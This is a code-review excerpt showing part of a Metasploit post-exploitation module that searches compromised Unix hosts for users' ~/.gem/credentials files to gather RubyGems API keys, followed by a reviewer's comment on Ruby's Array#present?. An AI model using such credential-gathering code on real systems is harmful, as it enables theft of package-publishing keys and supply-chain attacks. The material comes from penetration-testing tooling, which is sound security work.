modules/post/multi/gather/rubygems_api_key.rb

```diff
@@ -0,0 +1,65 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'yaml'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Multi RubyGems API Key Gather ./gem/credentials',
+      'Description'   => %q{
+        This module obtains a user's RubyGems API key from ~/.gem/credentials.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'Jonathan Claudius <jclaudius[at]trustwave.com>',
+                           'Brandon Myers <bmyers[at]trustwave.com>' ],
+      'Platform'      => %w{ bsd linux osx unix },
+      'SessionTypes'  => [ 'shell' ]
+    ))
+  end
+
+  def run
+    print_status("Finding .gem/credentials")
+    paths = enum_user_directories.map {|d| d + "/.gem/credentials"}
+    paths = paths.select { |f| file?(f) }
+
+    if paths.nil? or paths.empty?
```

Comment:
If I remember correctly, the object type of path in this context is an Array, which doesn't have a #present? 

http://www.ruby-doc.org/core-2.1.5/Array.html

But, I did look into this further (RE: your Rails bread crumb) and noticed that Rails does modify Object with the #present? method.

http://api.rubyonrails.org/classes/Object.html#method-i-present-3F

So, although this technically works with #present?, it seems sort of unnecessary to depend on such functionality if it's not material to the test.  With that said, I'd happily change it if you feel strongly about it.